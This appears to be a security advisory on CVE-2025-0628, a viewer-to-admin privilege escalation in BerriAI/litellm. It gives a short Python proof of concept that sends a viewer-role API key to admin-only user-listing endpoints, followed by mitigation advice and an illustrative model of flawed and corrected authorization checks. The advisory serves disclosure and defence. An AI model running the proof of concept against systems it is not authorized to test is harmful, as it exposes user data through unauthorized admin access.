A recently disclosed vulnerability, CVE-2025-0628, in the main-latest version of BerriAI/litellm, a popular AI/ML proxy and gateway platform, has raised concerns about its security. The vulnerability is an improper authorization issue affecting users with the 'internal_user_viewer' role. This role is meant to have limited, read-only access to the application's functionality, but because of the flaw a user holding it can reach admin-only functionality, including sensitive endpoints such as '/users/list' and '/users/get_users', which amounts to a vertical privilege escalation from a viewer account to administrator capabilities.
Original References
The vulnerability was initially discovered and reported by the security research team at CyberXplore (Link to the original report). The National Vulnerability Database (NVD) also has an entry for it with the related references (Link to NVD).
Exploit Details
The root cause is that the application issues an overly privileged API key when a user with the 'internal_user_viewer' role logs in. That key should grant read-only access only, but it unintentionally grants write access as well, so any request authenticated with it is treated as coming from a more privileged principal. The authorization failure therefore happens at key issuance rather than at the individual endpoints, which is why every admin endpoint that trusts the key is affected.
The issue can be reproduced with the following Python snippet, using the key that the proxy hands to a logged-in 'internal_user_viewer' user (replace the example host with your own deployment):
import requests

# Replace '{API_KEY}' with the overly privileged API key assigned to the
# 'internal_user_viewer' role at login
api_key = '{API_KEY}'
headers = {'Authorization': f'Bearer {api_key}'}
base_url = 'https://example.com/litellm/api'

# '/users/list' should be restricted to PROXY_ADMIN users only.
# A 200 with a user listing means the viewer key is being treated as admin;
# a 401/403 means the endpoint is enforcing the role correctly.
response = requests.get(f'{base_url}/users/list', headers=headers, timeout=10)
print(response.status_code)
print(response.text)

# '/users/get_users' should likewise be restricted to PROXY_ADMIN users only.
response = requests.get(f'{base_url}/users/get_users', headers=headers, timeout=10)
print(response.status_code)
print(response.text)
Running this code with a viewer-role key against an affected instance returns the user listings from '/users/list' and '/users/get_users', endpoints reserved for PROXY_ADMIN. Because the key also carries write access, the same user can invoke other admin-only functionality, effectively operating with PROXY_ADMIN privileges.
Mitigation
To address this vulnerability, the development team at BerriAI must ensure that proper authorization is enforced for each endpoint: the caller's role should be resolved from the authoritative user record on every request and checked against an explicit per-endpoint allow list, rather than trusted from whatever privileges were attached to the key at login. This prevents users with limited roles from reaching admin functionality even if a key was issued with overly broad rights. As a temporary measure, operators are encouraged to remove the 'internal_user_viewer' role from non-admin users until an official patch or update is available. Since the overly privileged keys are minted at login, any key issued to a viewer-role user while the vulnerable version was deployed should also be treated as compromised and revoked or rotated, not merely left in place after the role is removed.
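The following is an added example, written for this page and not taken from litellm's code base, of the two authorization patterns described above. It models the flawed behaviour as a login key that carries an admin role claim regardless of who logged in, and a corrected check that resolves the role from the user table on every request and applies a per-endpoint allow list that fails closed. The role names are the ones the advisory uses; the user table, key store, endpoint table and function names are hypothetical stand-ins, and the sample users are constructed data.

```python
import hashlib
import secrets

# Role names as used in the advisory; the role set itself is a stand-in.
PROXY_ADMIN = "proxy_admin"
INTERNAL_USER_VIEWER = "internal_user_viewer"

# Authoritative user table (constructed sample data): user id -> role.
USERS = {
    "u-admin": PROXY_ADMIN,
    "u-viewer": INTERNAL_USER_VIEWER,
}

# Per-endpoint allow list: (method, path) -> roles permitted to call it.
# Anything not listed is denied, so a new endpoint is closed until someone
# deliberately grants roles to it.
ENDPOINT_ROLES = {
    ("GET", "/users/list"): {PROXY_ADMIN},
    ("GET", "/users/get_users"): {PROXY_ADMIN},
    ("GET", "/user/info"): {PROXY_ADMIN, INTERNAL_USER_VIEWER},
}

# Roles that may never perform a write, whatever the endpoint table says.
READ_ONLY_ROLES = {INTERNAL_USER_VIEWER}


def _key_id(api_key: str) -> str:
    """Index keys by their SHA-256 so the store never holds raw secrets."""
    return hashlib.sha256(api_key.encode()).hexdigest()


class KeyStore:
    """Hypothetical key store: key hash -> record."""

    def __init__(self):
        self._records = {}

    def mint_login_key_vulnerable(self, user_id: str) -> str:
        """Stand-in for the flawed pattern: the key minted at login carries an
        admin role claim no matter which user logged in."""
        api_key = "sk-" + secrets.token_urlsafe(24)
        self._records[_key_id(api_key)] = {"user_id": user_id, "role": PROXY_ADMIN}
        return api_key

    def mint_login_key_fixed(self, user_id: str) -> str:
        """Corrected pattern: the key only identifies the user; it carries no
        role claim, so there is nothing over-broad to trust later."""
        api_key = "sk-" + secrets.token_urlsafe(24)
        self._records[_key_id(api_key)] = {"user_id": user_id}
        return api_key

    def lookup(self, api_key: str):
        return self._records.get(_key_id(api_key))


def authorize_vulnerable(store: KeyStore, api_key: str, method: str, path: str) -> int:
    """Trusts the role claim stored with the key. Returns an HTTP status code."""
    rec = store.lookup(api_key)
    if rec is None:
        return 401
    allowed = ENDPOINT_ROLES.get((method.upper(), path))
    if allowed is None or rec.get("role") not in allowed:
        return 403
    return 200


def authorize_fixed(store: KeyStore, api_key: str, method: str, path: str) -> int:
    """Resolves the caller's role from the user table on every request, then
    checks it against the endpoint allow list. Returns an HTTP status code."""
    rec = store.lookup(api_key)
    if rec is None:
        return 401
    role = USERS.get(rec["user_id"])
    if role is None:
        return 401  # key belongs to a deleted or unknown user
    method = method.upper()
    allowed = ENDPOINT_ROLES.get((method, path))
    if allowed is None or role not in allowed:
        return 403
    if role in READ_ONLY_ROLES and method != "GET":
        return 403  # viewer roles never get write access
    return 200


def demo() -> dict:
    """Exercise both checks with a viewer key and an admin key."""
    store = KeyStore()
    viewer_bad = store.mint_login_key_vulnerable("u-viewer")
    viewer_good = store.mint_login_key_fixed("u-viewer")
    admin_good = store.mint_login_key_fixed("u-admin")
    return {
        "viewer_vulnerable_list": authorize_vulnerable(store, viewer_bad, "GET", "/users/list"),
        "viewer_fixed_list": authorize_fixed(store, viewer_good, "GET", "/users/list"),
        "viewer_fixed_info": authorize_fixed(store, viewer_good, "GET", "/user/info"),
        "admin_fixed_list": authorize_fixed(store, admin_good, "GET", "/users/list"),
        "unknown_key": authorize_fixed(store, "sk-not-a-real-key", "GET", "/users/list"),
        # A key mis-minted with an admin claim is still confined once the role
        # comes from the user table instead of from the key.
        "misminted_key_fixed_check": authorize_fixed(store, viewer_bad, "GET", "/users/list"),
    }


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name}: {status}")
```

The last case in demo() is the one that matters operationally: with the corrected check, a key that was already issued with an over-broad role claim no longer buys anything, because the role is looked up from the user record at request time. That still does not make such keys safe to keep (the record may be out of date, and other components may trust the claim), so they should be revoked as the mitigation above recommends.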
Conclusion
CVE-2025-0628 exposes BerriAI/litellm deployments to privilege escalation, allowing a seemingly harmless user with the 'internal_user_viewer' role to reach critical admin functionality. Until the issue is resolved, operators should be careful about who is granted the 'internal_user_viewer' role, revoke keys issued to such users on affected versions, and follow the project's security guidance. Enforcing roles and permissions at every endpoint, rather than trusting privileges attached to a credential at login, is essential to the security and integrity of any application.
Timeline
Published on: 03/20/2025 10:15:53 UTC